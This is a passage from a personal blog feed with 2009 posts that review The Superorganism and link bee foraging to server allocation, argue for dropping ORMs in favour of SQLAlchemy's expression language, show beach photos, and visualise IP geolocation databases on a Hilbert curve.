<a href="http://opensource.apple.com/source/procmail/procmail-1.2/procmail/src/procmail.c">procmail</a>,
which turns out to be an absolutely unparalleled phenomenon. Go on, have a look - I dare ya.</p>
Non-programming books for Programmers: The Superorganism, Hölldobler & Wilson
2009-10-25T00:00:00+00:00
2009-10-25T00:00:00+00:00
https://corte.si/posts/books/superorganism/
<div class="media">
<a href="https://www.amazon.com/Superorganism-Beauty-Elegance-Strangeness-Societies/dp/0393067041/ref=sr_1_1?dchild=1&keywords=superorganism&qid=1592693625&s=books&sr=1-1">
<img src="superorganism-cover.jpg" />
</a>
<div class="subtitle">
Superorganism
</div>
</div>
<p>It's impossible to talk about <em>The Superorganism</em> without first mentioning <a href="http://en.wikipedia.org/wiki/Bert_Holldobler">Bert
Hölldobler</a> and <a href="http://en.wikipedia.org/wiki/E._O._Wilson">E. O.
Wilson</a>'s most famous collaboration -
a book called simply <em>The Ants</em>. I've been fascinated with ants since childhood,
and <em>The Ants</em> is one of my favourite books - deep enough to be intellectually
satisfying on almost any detail, and broad enough to be one of those rare books
that summarizes nearly everything to be said about its subject. It's hard to
avoid platitudes like "authoritative" and "magisterial" when talking about a
book like this, so I will resort to a simple computer science analogy: <em>The
Ants</em> is to the study of ants what <em>The Art of Computer Programming</em> is to the
study of algorithms. Only more so, because unlike Knuth, Hölldobler and Wilson
actually completed their survey in 1990. It should be no surprise then, that I
had <em>The Superorganism</em> on pre-order as soon as I heard that Hölldobler and
Wilson were publishing their first new book in almost two decades. <em>The
Superorganism</em> expands on a theme that also lies at the heart of <em>The Ants</em> -
the workings of insect societies. <em>The Superorganism</em> paints with a broader
brush than its predecessor, touching frequently on the other great families of
eusocial insects - termites, bees and wasps.</p>
<div class="media">
<a href="atta_cephalotes.jpg">
<img src="atta_cephalotes.jpg" />
</a>
<div class="subtitle">
Atta cephalotes, Costa Rica
</div>
</div>
<p>If you haven't delved into the world of social insects before, you're in for a
treat. The range and complexity of social insect behaviour can be weirder and
more wonderful than anything found in science fiction. Consider, for example,
the lives of what the authors call the "ultimate superorganism": the
<a href="http://en.wikipedia.org/wiki/Attini">Attine</a> leafcutter ants. The remarkable
fact about the leafcutters is that they are farmers, cultivating vast fungal
gardens that provide them with essential nutrients. These fungal gardens are
grown on a substrate of leaf-matter, and leafcutters get their name from the
fact that colonies cut up enormous quantities of leaves to transport back to
their nests - one mature colony was estimated to harvest a leaf area of 4550
square meters per year. The fungus gardens are the lifeblood of the leafcutter
colony, and they are tended with endless patience and skill. Leaves brought back
to the nest are snipped up, molded into pellets, and carefully planted with
fungal hyphae taken from elsewhere in the garden. Workers patrol the fungal
gardens ceaselessly, weeding out foreign fungal strains and other contaminants.
The ants secrete antibiotics that inhibit the growth of other fungi, and produce
growth hormones that enhances the growth of their own strain. They wage an
endless battle against <em>Escovopsis</em>, a parasitic species of fungus that
specialises in invading Attine leafcutter gardens. Remarkably, an important
part of their arsenal is a second symbiont: a bacterium that only occurs on the
cuticle of leafcutter ants, which produces powerful antibiotics specific to the
fungal pest. The ants grow these bacterial weapons on special patches of
cuticle, modified specifically to house them. There is also a degree of
communication between the ants and their garden fungus. Leafcutter ants are
sensitive to the chemicals signals released by distressed fungus, and learn to
avoid food that harms their gardens. When a new queen leaves the nest to mate
and establish a colony of her own, she carries a sample of the fungus from her
parent colony in a cavity next to her oesophagus. Once she has found a likely
nesting spot, she spits out the fungal sample, and tends the growing cultivar as
closely as she does her own offspring, feeding it with secreted fluid, while she
herself subsists off her own bodyfat. Once the first brood of workers have been
raised, the queen assumes her proper position as the egg-laying machine at the
center of the colony, feeding on unfertilized eggs laid by her workers. If her
colony is successful, she will produce about 20 eggs a minute, 24 hours a day,
resulting in between 150 and 200 million offspring during her life. The colony
can consist of several million ants at any one time. This population is housed
in a colossal nest - one typical example had 1920 chambers with 238 fungus
gardens. To build it, the ants had to shift 40 tonnes of soil. The nest itself
is designed to provide optimal ventilation and humidity for the fungal gardens,
and is continually adjusted by the ants to achieve the right conditions.
Stretching out from the nest is a set of foraging tunnels that surface into a
web of trunk routes along which leaf material is brought back to the nest.
Trunk routes are meticulously maintained, with "road workers" clearing debris
and encroaching vegetation. Within the ant population there are a range of
physical castes, each adapted to a specific set of jobs. The smallest workers
maintain and patrol the fungal gardens. The largest are gigantic supersoldiers
that specialise in deterring vertebrate predators. Underpinning all of this is a
sophisticated chemical communication system, involving a huge array of
pheromones, and an incredibly sensitive sensory system. Hölldobler and Wilson
cite research that shows that one milligram of the trail pheromone of <em>Atta
texana</em> is enough to lead a worker 60 times around the Earth.</p>
<p>Ponder for a moment the immense behavioural complexity required to sustain a
sophisticated insect civilization like this. There are an extraordinary number
of behaviours that need to be optimized, many of which read like they are
straight from the pages of a programming competition. Foraging strategies need
to be devised to efficiently discover food sources. Once a food source is
discovered, its value needs to be estimated, and the right fraction of the
colony's labour pool needs to be allocated to exploit it. Throughput needs to be
optimised by selecting the right leaf fragment size, while minimizing the
significant energetic cost of cutting leaves up smaller than necessary. The cost
of constructing and maintaining the web of trunk routes needs to be weighed
against the efficiency benefits gained (it turns out that they can improve
foraging speed tenfold). There are many, many other interesting sub-problems
like these, and the colony solves them all admirably. The entire system reminds
one of a super-complicated real-time strategy game, and we can be forgiven for
suspecting that there must be some hyper-intelligent controller micromanaging a
<a href="http://starcraft.wikia.com/wiki/Zerg">Zerg-like</a> expansion of the nest. Here,
however, we come to perhaps the most remarkable fact about social insects: their
colonies are leaderless. There is no central strategist at all - their entire
range of sophisticated behaviour is emergent, arising from the aggregate actions
of many small simple units with only local information. And yet, millions of
ants can act with such apparent coherence and purpose that biologists like
Hölldobler and Wilson have started thinking of colonies as organisms in
themselves - "superorganisms" that compete, mate, and strive for survival.</p>
<p>Humanity has not yet learned how to cross the chasm that separates the
individual ant from the superorganism. We've seen the early glimmers of
technologically produced distributed systems - one thinks of things like the
Internet, peer-to-peer networks, and maybe some nebulous social constructs like
"the blogosphere". The fact is, however, that we are simply incapable of
designing distributed systems that even begin to approach the robustness and
intricacy of insect colonies. $!superorg!$ is certainly not a manual for
applying insectiod principles of distributed engineering to technological
problems. It is, however, the best available overview of the best distributed
systems we know of, and for that reason alone should be on every intellectually
curious computer scientist's bookshelf.</p>
<h2 id="bees-resource-allocation-peer-to-peer-communication-and-tiered-architectures">Bees: resource allocation, peer-to-peer communication and tiered architectures</h2>
<div class="media">
<a href="waggle-dance.jpg">
<img src="waggle-dance.jpg" />
</a>
<div class="subtitle">
The essential form of the honeybee waggle dance, p. 170 of The Superorganism. Reproduced here with the kind permission of its creator, <a href='http://www.margynelson.com/RumfordGraphics-Front-Page.html'>Margaret Nelson</a>
</div>
</div>
<p>That's all very exciting, but it's not very concrete. So, for the second part of
this review, I'll look at one example of distributed problem solving covered in
$!superorg!$, and explore its fascinating parallels with computer science.</p>
<p>The best-studied insect society is surely that of <em>Apis mellifera</em>, the
honeybee. In 1947 <a href="http://en.wikipedia.org/wiki/Karl_von_Frisch">Karl von
Frisch</a> famously decoded part of
the "dance language" of the honeybee, showing that the bee <a href="http://en.wikipedia.org/wiki/Waggle_dance">waggle
dance</a> was used to convey precise
information about the distance, direction and quality of a food source to nearby
bees. The amazing discovery that bees conveyed complex abstract notions of this
type to each other gave us an early insight into the wonder of social insect
communication. Over the years since von Frisch's discovery, it has gradually
emerged that the waggle dance is just one of a complex set of signals used to
implement a distributed resource allocation strategy inside the bee colony. The
bees in a hive are loosely specialised into "foragers", who go out of the hive
to gather food, and "nectar processors", who remain in the hive to receive
nectar from incoming foragers for processing and storage. When a forager returns
to the nest laden with pollen and nectar, it searches until it finds a free
processor to accept its cargo. The first optimisation problem the hive faces is
to balance these two populations of specialists, minimising the waiting time for
foragers dropping off their cargos as well as idle time for processors waiting
to accept them. The second optimisation problem arises from the fact that the
supply of nectar sources is not constant - if a new grove of flowers in bloom is
discovered, the hive has to divert resources to exploit it as quickly as
possible, adjusting the number of foragers and processors to match. This is
complicated by the fact that not all nectar sources are equal: some might be
particularly rich, and therefore require more foragers to exploit. A particular
bee hive might be extracting nectar from a number of flower patches at the same
time, and foragers need to be allocated optimally, and continually re-balanced.
Remarkably, the bee colony accomplishes these goals without any central
co-ordination, using an entirely distributed algorithm. To see how they do this,
we need to flesh out the bee dance language somewhat. Hölldobler and Wilson
describe three basic bee dances:</p>
<ul>
<li><strong>Waggle dance</strong>: The famous dance discovered by von Frisch, which directs
forager bees to a specific resource with precise information on the location
and distance.</li>
<li><strong>Shaking dance</strong>: Recruits more bees to foraging, sending them to the dance
floor to look for waggle dancers.</li>
<li><strong>Tremble dance</strong>: Induces waggle dancers to stop dancing, and recruits bees
to nectar processing.</li>
</ul>
<p>These dances are signals that provide the communications framework for the "bee
algorithm", sketched out by Hölldobler and Wilson in the following set of
decision rules:</p>
<blockquote>
<p>1 | Not enough nectar collectors in the field? If yes, and you also
have immediate knowledge of a producing flower patch, perform the
waggle dance.</p>
<p>2 | Is the flower patch rich or the weather fine or the day early or
does the colony need substantially more food? Perform the dance with
appropriately greater vivacity and persistence.</p>
<p>3 | Not enough active foragers to send into the field? Perform the
shaking maneuver.</p>
<p>4 | Not enough nectar processors in the hive to handle the nectar
inflow? Perform the tremble dance.</p>
</blockquote>
<p>So, how do bees decide if there are too many foragers or too many nectar
processors, using purely local information? The answer is simple and elegant: if
a returning forager experiences a wait time of 20 seconds or less before finding
a nectar processor, they assume that there is a surplus of processors and
recruit more bees to foraging through the waggling dance. If they experience a
wait time of 50 seconds or more, they assume that there are too many foragers,
and use the tremble dance to both reduce the number foragers and increase the
number of processors. Notice that all the signals used in this system are "peer
to peer" - bees only communicate with nearby bees that are in the hive at the
moment of communication.</p>
<p>The system described above is clear enough to implement easily, and there is a
rich range of parallels with computer science. It's not surprising, therefore,
that a a bit of searching through the literature shows that a number of computer
scientists have started mining the bee resource allocation algorithm for ideas.
One nice example comes from Sunil Nakrani and <a href="http://www2.isye.gatech.edu/%7Ectovey/">Craig
Tovey</a>, who have successfully applied a
subset of the behaviour outlined above in a paper called <a href="http://www2.isye.gatech.edu/%7Ectovey/publications/papers/bee.oct19.2004.masi2.pdf">On Honey Bees and
Dynamic Allocation in an Internet Server
Colony</a>.
Consider a hypothetical data center of servers used to implement a hosted
application environment. Each application is backed by a dynamic pool of virtual
servers, and servers can be added to or removed from the pools transparently.
There is, however, a switching cost to moving resources about - re-allocating a
virtual server involves server downtime and therefore lost revenue. Application
load varies unpredictably - one day an application might be getting three hits a
day, and the next it might crop up on Reddit and have a massive load spike. The
hosting company is paid based on usage - say, per HTTP request served - and
faces the complex problem of optimally allocating its server resources to
minimize downtime and maximize revenue. Nakrani and Tovey approach this problem
by mapping the bee resource allocation system onto the server allocation
problem. In this mapping, foraging bees are the servers, and flower patches are
the applications. In nature, the bee recruitment signal - the waggle dance
described above - is triggered if a flower patch is sufficiently "profitable".
The more profitable the nectar source, the greater the "vivacity and
persistence" of the recruitment signal. Nakrani and Tovey simulated a system
where servers used a central advertboard to post recruitment adverts. In broad
terms, Nakrani and Tovey's servers were more likely to read a random advert from
the advertboard, and switch to a different application, when their current
application was less profitable. On the other hand, a server was more likely to
post an advert to recruit more servers to its application, if its application
was more profitable. The result is a distributed algorithm that performs within
about 11.5% of an omniscient resource allocator with complete knowledge of all
future HTTP requests.</p>
<p>Interestingly, Nakrani and Tovey also had something to teach entomologists. They
found that while the bee recruitment algorithm performed superbly when there was
a lot of variability in application load, it was outperformed by much simpler
algorithms when load was relatively static. Their simulation therefore seems to
indicate that the bee recruitment algorithm is an adaptation to variability in
nectar sources. While this blog post focuses on what computer scientists can
learn from insects, the possibility that information might flow the other way is
a fascinating one. When I first read about the loose specialisation in the
beehive, with foragers handing over their load to processors, my immediate
thought was that this described a tiered architecture. Now, there are a number
of sound non-architectural reasons why a colony would want to have some bees
specialise in foraging. Foragers tend to be the older bees in the colony, and
this makes complete sense. Foraging is a hazardous activity, and bees have a
limited lifespan. Sending out bees that are approaching the end of their lives
anyway is good economics. Hölldobler and Wilson write that this specialisation</p>
<blockquote>
<p>... causes a problem for the honeybee colony: How can the rate of food
collection, particularly of nectar, and the rate of food processing be kept
in balance?</p>
</blockquote>
<p>The computer scientist in me suspects that there may be a different way to look
at this aspect of bee behaviour. In computing we produce tiered architectures
with independent layers because they <em>improve</em> efficiency and flexibility in
various ways. I can't help but wonder if a similar benefit might support this
aspect of bee behaviour.</p>
<h2 id="postscript">Postscript</h2>
<p>One last note before I'm done. Karl von Frisch once said that</p>
<blockquote>
<p>... the life of bees is like a magic well. The more you draw from it, the
more there is to draw.</p>
</blockquote>
<p>There are some 20,000 species of bee in the world, ranging from solitary species
to the great super-societies of domestic honeybees. There are 14,000 species of
ants, 4,000 species of termite, and more than 100,000 species of wasp. Each of
these species is a unique product of evolution's boundless ingenuity, and each
has its own suite of solutions to the problems of survival. When one of these
species disappears - and they are doing so at a terrifying rate - the tragedy is
not simply that something beautiful is irretrievably gone from the world, but
also that we have lost another irreplaceable magic well to study, learn from,
and emulate. E. O. Wilson has devoted much of the latter years of his life to
the great cause of preserving our biological legacy - if you are interested in
this urgent issue (and you should be) I recommend his 2002 book <a href="https://www.amazon.com/Future-Life-Edward-Wilson/dp/0679768114">The Future of
Life</a> .</p>
A Farewell to ORMs
2009-10-12T00:00:00+00:00
2009-10-12T00:00:00+00:00
https://corte.si/posts/code/farewell-to-orms/
<p>j I've been using ORMs for years, starting with my own hand-hacked library back
in the days before there were good ORMs for Python, and more recently settling
into a comfortable reliance on <a href="http://www.sqlalchemy.org/">SQLAlchemy</a>. Over
time, though, my initially rosy feelings towards ORMs have begun to sour. I
gradually realised I was spending a disproportionate amount of time trying to
coax the ORM into doing my bidding - and when I succeeded, the results were
often ugly, slow and needlessly opaque. Analysing the performance of some of
the more complicated portions of my data access layer was often painful, and I
spent cumulative hours poring over generated SQL, trying to figure out what the
ORM was doing and why. Usually, improving performance involved side-stepping the
ORM altogether. Recently, a particularly gnarly performance issue prompted me to
ditch the ORM from a project altogether, with surprisingly pleasant results.</p>
<h2 id="impedance-mismatch">Impedance mismatch</h2>
<p>Ask any programmer why they use an ORM, and the answer is likely to be
"impedance mismatch". This is a lovely phrase from a rhetorical point of view -
hovering at the edge of meaning, but nicely avoiding asserting anything that can
actually be quantified. The usual hand-wave is that impedance mismatch arises
from the tension between table-oriented relational data, and object oriented
conceptual thinking. Your Bicycle class - a subclass, naturally, of Vehicle -
might have to be reconstructed from data scattered across six different tables,
and it's a distressing possibility that none of those tables might be called
Bicycle, or indeed Vehicle. What we should aim for, the argument goes, is a
programmer's Shangri-La where where we can transparently persist and restore our
objects and have the storage taken care of by some magical plumbing. Whether or
not the magical plumbing is worthwhile depends largely on how often the
abstraction breaks down. The ORM approach does so frequently. Yes, I can use an
ORM and think at the object level in the common case, but whenever I need to do
anything remotely complicated - optimising a query, say - I'm back in the land
of tables and foreign keys. In the end, the structure of data is something
fundamental that can't be simplified or abstracted away. The ORM doesn't resolve
the impedance mismatch, it just postpones it.</p>
<h2 id="a-lighter-abstraction">A lighter abstraction</h2>
<p>So, if ORMs are at best a very partial solution to the ill-defined impedance
mismatch problem, why do so many programmers swear by them? It's not that
they're all fools, it's just that ORMs solve ANOTHER practical problem much more
successfully. Most programmers who use ORMs do so simply to avoid re-writing
endless nearly identical CRUD operations for every persistable object in their
project. This isn't about any fundamental object-relational impedance mismatch -
it's simply a problem of query generation. So, this brings me to my own
difficult-to-quantify contribution to the miasma of fuzzy thinking that already
surrounds this issue: <strong>90% of the benefit most people derive from ORMs can be
gained more simply and more transparently through unashamedly table-oriented
query generation</strong>. All we need is a nice programmatic way to generate and
manipulate SQL statements... Luckily we have just such a tool in the SQLAlchemy
<a href="http://www.sqlalchemy.org/docs/05/sqlexpression.html">SQLAlchemy SQL expression
language</a> - a good, simple
and nearly complete language for working with SQL expressions from Python.</p>
<p>Pursuing this line of thought, I've ditched the ORM from a few of my projects.
Instead, I'm using a defter abstraction - a simple, lightweight framework that
uses SQLAlchemy's SQL expression language to auto-generate most queries. This
framework is unashamedly table-oriented, and exists to manipulate data at a
relational level. It clocks in at less than 150 lines of code. The database
schema is no longer defined by the ORM - instead, helper objects are built
through schema reflection. The result has been satisfying - my data layers are
better encapsulated, database interaction is more transparent, and the
conceptual complexity is much reduced. Since nothing happens magically behind
the scenes, it's easier to analyse performance, and since there is no session
layer (few projects really need one) a whole chunk of complexity has gone away.
Using reflection rather than defining the schema in code has made schema
evolution much less of a chore. I also retain other benefits usually attributed
to ORMs - the expression language abstracts away flavour differences between
databases, so I can still, for example, run a large fraction of my unit tests
against in-memory SQLite databases and deploy on PostgreSQL. I'm now gradually
migrating all my projects to this way of working.</p>
Leopard Seal at Sandfly Bay
2009-09-09T00:00:00+00:00
2009-09-09T00:00:00+00:00
https://corte.si/posts/photos/leopardseal/
<div class="media">
<a href="leopardseal.jpg">
<img src="leopardseal-small.jpg" />
</a>
<div class="subtitle">
Leopard Seal at Sandfly Bay
</div>
</div>
<p>Took this shot on my morning walk, 15 minutes away from my home. We are usually
the only humans on this 1km beach, and we are often out-numbered 10-1 by sea
lions. The photo is of a <a href="http://en.wikipedia.org/wiki/Leopard_Seal">leopard
seal</a> - a rarity in these parts.
These sleek top-predators bear as much resemblance to the portly and <a href="http://www.flickr.com/photos/8268815@N08/3886175958/">rather
ridiculous</a> sea lions as a
labradoodle does to a wolf. This one was a juvenile - only about 2.5 meters long -
but still managed to exude a considerable amount of toothy menace.</p>
Visualising IP Geolocation
2009-09-05T00:00:00+00:00
2009-09-05T00:00:00+00:00
https://corte.si/posts/code/hilbert/explorer/
<style>
.jpexample img {
background: url(/geohilbert/ALL.png);
}
</style>
<div class="media jpexample">
<a href="/geohilbert/JP.png">
<img src="/geohilbert/JP.png" />
</a>
<div class="subtitle">
IP Addresses in Japan
</div>
</div>
<p>I'm spending a fair bit of my time working on a project that uses an IP
geolocation database to map internet addresses to countries as part of a
security survey. There are a number of these location databases available, but
comparing their quality and coverage is not trivial, so selecting one to use is
hard. I recently decided to spend a few hours looking at the problem, and got
hopelessly side-tracked into visualising the databases using the Hilbert curve.
The result is the <a href="/geohilbert/index.html">Hilbert Explorer</a>, a
mapping of the geographical location of IP addresses onto the Hilbert Curve. You
should have a play with it before reading the rest of this post.</p>
<h2 id="the-hilbert-curve-a-very-brief-introduction">The Hilbert Curve - a (very) brief introduction</h2>
<p>The <a href="http://en.wikipedia.org/wiki/Hilbert_curve">Hilbert Curve</a> is a
space-filling <a href="http://mathworld.wolfram.com/Curve.html">curve</a> that
is usually produced iteratively, with the N-th step in the iteration referred to
as the "order N" curve. Here are orders 1 to 5:</p>
<table class="spacertable">
<tr>
<td><img src="h1.png"/><br>N=1</td>
<td><img src="h2.png"/><br>N=2</td>
<td><img src="h3.png"/><br>N=3</td>
<td><img src="h4.png"/><br>N=4</td>
<td><img src="h5.png"/><br>N=5</td>
</tr>
</table>
<p>To translate from one order to the next, we simply replace U-shapes like the
the N=1 diagram with Y-shapes like the N=2 diagram. So, in the N=1 diagram
there is a single U to be replaced, in the N=2 diagram there are 4 U-shapes
(two at the top, oriented left and right, and two at the bottom oriented down).
Each subsequent order has 4 times the number of U shapes the previous one had,
so for N=3 we have 16 replacements to do, and so on and so forth.</p>
<p>Mathematicians are interested in the behaviour of the limit curve as N
approaches infinity - luckily the properties of the curve that are interesting
to computer scientists manifest well short of that. For the purposes of this
post, we can view the order-N curve simply as a way to lay out a sequence of
2**2N items on a plane, with the rather interesting property that items that
are near each other in the sequence are also near each other on the plane:</p>
<div class="media">
<a href="coordinates.png">
<img src="coordinates.png" />
</a>
</div>
<p>The recursive construction above is a nice way to explain the curve, but doesn't
lead to an efficient way to actually draw it. For this I turned to Henry S.
Warren's wonderful <a href="http://www.amazon.com/exec/obidos/ASIN/0201914654/qid%3D1033395248/sr%3D11-1/ref%3Dsr_11_1/104-7035682-9311161">Hacker's
Delight</a>, one of those books that I return to again and again. If you don't
already own a copy, just buy it - you won't be disappointed. All the images in
this post and in the Explorer were drawn with PyCairo using the algorithm for
calculating co-ordinates from the distance along the curve given in section 14.4
of this book.</p>
<h2 id="visualising-ip-geolocation">Visualising IP Geolocation</h2>
<p>Mapping IP addresses to countries is a tricky affair. Control of any given
address filters down from IANA to the regional registries, from regional
registries to national and local registries, and from there to a myriad of
private and government organisations. Here, horse-trading and private enterprise
takes over and IP blocks are sold, traded and routed arbitrarily, with the
consequence that any given IP might actually be located in geographical area
totally unrelated to the controlling organization or even the registry region. A
number of companies now offer geolocation databases at various prices, some of
them for free. The databases themselves typically contain more than 100,000
subnets, usually spanning something like two billion actual addresses. I had
about half a dozen of these databases to compare, and, being a visual creature,
I wanted to <strong>see</strong> what I was dealing with. I've been fascinated with the
Hilbert curve for a long time, but I first came across the idea of using it to
visualise the entire IPv4 address space in Randall Munroe's excellent <a
href="http://xkcd.com/195/">hand-drawn map of the Internet</a>. After this was
published in 2006 a slew of more detailed visualisations appeared, including at
least <a href="http://www.isi.edu/ant/address/whole_internet/index.html">one on
a 1:1 scale</a>.</p>
<p>We can map X points of data onto a discrete Hilbert curve of order lb(X)/2, so
the order 16 Hilbert curve would suffice to display all 2**32 IP addresses at
a one-to-one scale. To produce a more manageable image size, I used an order 9
Hilbert curve producing a 512x512 pixel image, where each pixel represents a
bucket of 16384 addresses. I then rendered a series of transparent PNG layers -
one showing all addresses in the database, and a set of overlays showing the
addresses in each country and some "landmarks" like the <a
href="http://tools.ietf.org/html/rfc1918">RFC1918</a> addresses. The result
looks something like the image at the head of this post. To make the
visualisation more interactive, I bolted things together with a bit of
Javascript to let me easily switch between countries, and to show IP addresses
when hovering over the image. You can find the resulting visualisation for one
of the freely-available geolocation databases - <a
href="http://www.wipmania.com/en/base/">WorldIP</a> - here:</p>
<h2 id="hilbert-explorer"><a href="/geohilbert/index.html">Hilbert Explorer</a></h2>
<p>I'll stop there for now, and leave the actual database comparison and a deeper
exploration of the related issues for future posts.</p>
Seashells from Murdering Beach
2009-08-28T00:00:00+00:00
2009-08-28T00:00:00+00:00
https://corte.si/posts/photos/murderingshells/
<style>
.shells td {
border-bottom: 0;
}
</style>
<table class="shells">
<tr>
<td><a href="http://www.flickr.com/photos/8268815@N08/3863253255/" title="051shells by cortesi, on Flickr"><img src="http://farm3.static.flickr.com/2598/3863253255_b6a88458a6_t.jpg" width="100" height="100" alt="051shells" /></a></td>
<td><a href="http://www.flickr.com/photos/8268815@N08/3863255667/" title="052shells by cortesi, on Flickr"><img src="http://farm3.static.flickr.com/2477/3863255667_9de928b4d2_t.jpg" width="100" height="100" alt="052shells" /></a></td>
<td><a href="http://www.flickr.com/photos/8268815@N08/3863256917/" title="056shells by cortesi, on Flickr"><img src="http://farm3.static.flickr.com/2626/3863256917_9da498eb94_t.jpg" width="100" height="100" alt="056shells" /></a></td>
<td><a href="http://www.flickr.com/photos/8268815@N08/3864040990/" title="057shells by cortesi, on Flickr"><img src="http://farm3.static.flickr.com/2601/3864040990_b6465402e8_t.jpg" width="100" height="100" alt="057shells" /></a></td>
<td><a href="http://www.flickr.com/photos/8268815@N08/3864042394/" title="059shells by cortesi, on Flickr"><img src="http://farm3.static.flickr.com/2662/3864042394_fd9a3e2f14_t.jpg" width="100" height="100" alt="059shells" /></a></td>
</tr>
<tr>
<td><a href="http://www.flickr.com/photos/8268815@N08/3864043258/" title="060shells by cortesi, on Flickr"><img src="http://farm3.static.flickr.com/2557/3864043258_2187b97b8c_t.jpg" width="100" height="100" alt="060shells" /></a></td>
<td><a href="http://www.flickr.com/photos/8268815@N08/3863260683/" title="061shells by cortesi, on Flickr"><img src="http://farm3.static.flickr.com/2553/3863260683_6cc9662275_t.jpg" width="100" height="100" alt="061shells" /></a></td>
<td><a href="http://www.flickr.com/photos/8268815@N08/3864044842/" title="062shells by cortesi, on Flickr"><img src="http://farm4.static.flickr.com/3181/3864044842_83ed99b591_t.jpg" width="100" height="100" alt="062shells" /></a></td>
<td><a href="http://www.flickr.com/photos/8268815@N08/3863262185/" title="064shells by cortesi, on Flickr"><img src="http://farm4.static.flickr.com/3454/3863262185_c93aff80f1_t.jpg" width="100" height="100" alt="064shells" /></a></td>
<td><a href="http://www.flickr.com/photos/8268815@N08/3863263741/" title="065shells by cortesi, on Flickr"><img src="http://farm3.static.flickr.com/2596/3863263741_1de40df77a_t.jpg" width="100" height="100" alt="065shells" /></a></td>
</tr>
<tr>
<td><a href="http://www.flickr.com/photos/8268815@N08/3863264743/" title="066shells by cortesi, on Flickr"><img src="http://farm3.static.flickr.com/2531/3863264743_e51a081754_t.jpg" width="100" height="100" alt="066shells" /></a></td>
<td><a href="http://www.flickr.com/photos/8268815@N08/3863265971/" title="067shells by cortesi, on Flickr"><img src="http://farm3.static.flickr.com/2584/3863265971_a540e4cd74_t.jpg" width="100" height="100" alt="067shells" /></a></td>
<td><a href="http://www.flickr.com/photos/8268815@N08/3863267413/" title="068shells by cortesi, on Flickr"><img src="http://farm4.static.flickr.com/3513/3863267413_efda95bd09_t.jpg" width="100" height="100" alt="068shells" /></a></td>
<td><a href="http://www.flickr.com/photos/8268815@N08/3863268603/" title="069shells by cortesi, on Flickr"><img src="http://farm3.static.flickr.com/2461/3863268603_49c216a076_t.jpg" width="100" height="100" alt="069shells" /></a></td>
<td><a href="http://www.flickr.com/photos/8268815@N08/3863270349/" title="070shells by cortesi, on Flickr"><img src="http://farm3.static.flickr.com/2565/3863270349_2df1a30663_t.jpg" width="100" height="100" alt="070shells" /></a></td>
</tr>
<tr>
<td><a href="http://www.flickr.com/photos/8268815@N08/3863271463/" title="071shells by cortesi, on Flickr"><img src="http://farm3.static.flickr.com/2633/3863271463_b8bb6c9416_t.jpg" width="100" height="100" alt="071shells" /></a></td>
<td><a href="http://www.flickr.com/photos/8268815@N08/3864056086/" title="072shells by cortesi, on Flickr"><img src="http://farm3.static.flickr.com/2449/3864056086_9bd2441496_t.jpg" width="100" height="100" alt="072shells" /></a></td>
<td><a href="http://www.flickr.com/photos/8268815@N08/3863273851/" title="073shells by cortesi, on Flickr"><img src="http://farm3.static.flickr.com/2598/3863273851_e36366e0aa_t.jpg" width="100" height="100" alt="073shells" /></a></td>
<td><a href="http://www.flickr.com/photos/8268815@N08/3863275055/" title="074shells by cortesi, on Flickr"><img src="http://farm4.static.flickr.com/3547/3863275055_0b078205e7_t.jpg" width="100" height="100" alt="074shells" /></a></td>
<td><a href="http://www.flickr.com/photos/8268815@N08/3863276473/" title="075shells by cortesi, on Flickr"><img src="http://farm4.static.flickr.com/3438/3863276473_918bc411d0_t.jpg" width="100" height="100" alt="075shells" /></a></td>
</tr>
<tr>
<td><a href="http://www.flickr.com/photos/8268815@N08/3864061252/" title="076shells by cortesi, on Flickr"><img src="http://farm3.static.flickr.com/2552/3864061252_48d169eac2_t.jpg" width="100" height="100" alt="076shells" /></a></td>
<td><a href="http://www.flickr.com/photos/8268815@N08/3864062554/" title="077shells by cortesi, on Flickr"><img src="http://farm4.static.flickr.com/3226/3864062554_3b2ac66bcf_t.jpg" width="100" height="100" alt="077shells" /></a></td>
<td><a href="http://www.flickr.com/photos/8268815@N08/3864063810/" title="078shells by cortesi, on Flickr"><img src="http://farm3.static.flickr.com/2459/3864063810_5cf4bcfb9a_t.jpg" width="100" height="100" alt="078shells" /></a></td>
<td><a href="http://www.flickr.com/photos/8268815@N08/3864064924/" title="079shells by cortesi, on Flickr"><img src="http://farm4.static.flickr.com/3511/3864064924_bcb95a8ea2_t.jpg" width="100" height="100" alt="079shells" /></a></td>
<td><a href="http://www.flickr.com/photos/8268815@N08/3864065752/" title="080shells by cortesi, on Flickr"><img src="http://farm3.static.flickr.com/2519/3864065752_44baaafcef_t.jpg" width="100" height="100" alt="080shells" /></a></td>
</tr>
</table>
<p>Spent the moring collecting and taking photos of tiny seashells on Murdering
Beach - a secluded local spot with a grisly past. The shells are all about the
same size - a centimeter or so accross - and seem to be from the same species of
marine mollusc. The variety of patterns and colours is endless and fascinating -
my inexpertly lit photographs don't do them justice.</p>
Sorting Algorithm Visualisation Tidbits
2009-08-11T00:00:00+00:00
2009-08-11T00:00:00+00:00
https://corte.si/posts/code/sortingquickies/
<ul>
<li>Jacob Seidelin has created an awesome port of the sorting algorithm
visualisations I came up with in 2007 to Javascript, using the canvas element
to do the drawing. <a
href="http://blog.nihilogic.dk/2009/04/canvas-visualizations-of-sorting.html">Well
worth checking out</a>.</li>
<li>Another blogger (I'd love to be more specific, but the blog seems to be
anonymous) was spurred by my post to to wonder what sorting algorithms <em>sound</em>
like. The fascinating result is <a
href="http://www.pillowsopher.com/blog/?cat=4">over here</a>. Bubblesort turns
out to quite musical - who knew?</li>
<li>Finally, timsort, which I drew <a href="https://corte.si/posts/code/timsort/">pictures of in my last
post</a>, has <a
href="http://bugs.sun.com/bugdatabase/view_bug.do?bug_id=6804124">replaced
mergesort in Java.</a></li>
</ul>
Visualising Sorting Algorithms: Python's timsort
2009-08-08T00:00:00+00:00
2009-08-08T00:00:00+00:00
https://corte.si/posts/code/timsort/
<p><strong>Update</strong> See <a href="http://sortvis.org">sortvis.org</a> for many more visualisations!</p>
<p>A couple of years ago, I blogged about a technique I came up with for
<a href="https://corte.si/posts/code/visualisingsorting/">statically visualising sorting
algorithms</a> during a somewhat
Scotch-fueled night of idle hacking. A recent day of poking at the Python
codebase gave me an excuse to revisit the post and brush off the bit of code
that underpins it. I've wanted to take a closer look at timsort - Tim Peters'
wonderful sorting implementation for Python - for a while now. In the previous
post I made a big deal about the fact that many attributes of sorting algorithms
are easier to see in my static visualisations than in traditional animated
equivalents. So, I thought it would be fun to see if one could get to grips with
a real-world algorithm like timsort by visualising it. The fruit of my labour
can be found below - if this kind of thing turns your crank, read on.</p>
